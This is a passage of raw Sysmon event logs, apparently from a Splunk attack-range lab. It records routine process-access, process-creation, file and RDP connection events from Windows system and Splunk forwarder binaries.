32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976280Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976279Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976278Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976277Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.921{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976276Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.921{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8829-6151-7379-00000000FD01}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976275Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.921{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8829-6151-7379-00000000FD01}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976274Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.906{69CF5F33-8829-6151-7379-00000000FD01}1316C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000976273Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:22.268{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-46660-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976272Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:25.421{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=654F437FE8882E58BB61628DA6992CC3,SHA256=A70E0EF6149D1D674C623E214C011A2A436A32947360690224182CD4B78C2F7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047755Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:26.291{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF50354C769EFA6B90A6A570A9035BA1,SHA256=337065C81DF609431C2A60781E98064CA8F9CC47E7EEEAB2968000D1469DE26F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976303Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.952{69CF5F33-882A-6151-7479-00000000FD01}3656348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000976302Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.952{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C352F332955F6671A2588F7D65C18452,SHA256=824E4BBF59AE45E70641E0E0CF7B42AC210742A61578A2CB370526BEF0287F6E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976301Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.561{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-882A-6151-7479-00000000FD01}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976300Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.561{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976299Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.561{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976298Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.561{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976297Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.561{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976296Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.561{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976295Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.561{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976294Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.561{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976293Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.546{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976292Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.546{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976291Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.546{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-882A-6151-7479-00000000FD01}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000976290Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.546{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-882A-6151-7479-00000000FD01}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000976289Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.516{69CF5F33-882A-6151-7479-00000000FD01}3656C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000976288Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.421{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=022701C1F1D6581E48F0B85B685FAD22,SHA256=8060AF56C4F2EFBC893A21816D6BD80B23ED3AAD7711C26511D258882896F7D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976287Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:26.233{69CF5F33-8829-6151-7379-00000000FD01}13163004C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047756Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:27.321{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4BC16BEF744DBAE7F42051C036BF6E8,SHA256=B6F4B217C4CB16AC9ADBC0345DC50A71B95F83421251A813D0D8C8B737CEE53D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976317Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.499{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D70FA0D5AF3FF5E97B3556561B2530F1,SHA256=A53CC882B6024A87922C1BA4EB477F89343E545E97E67199B768DBA69709BD7D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976316Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:27.421{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-882B-6151-7579-00000000FD01}3584C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976315Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 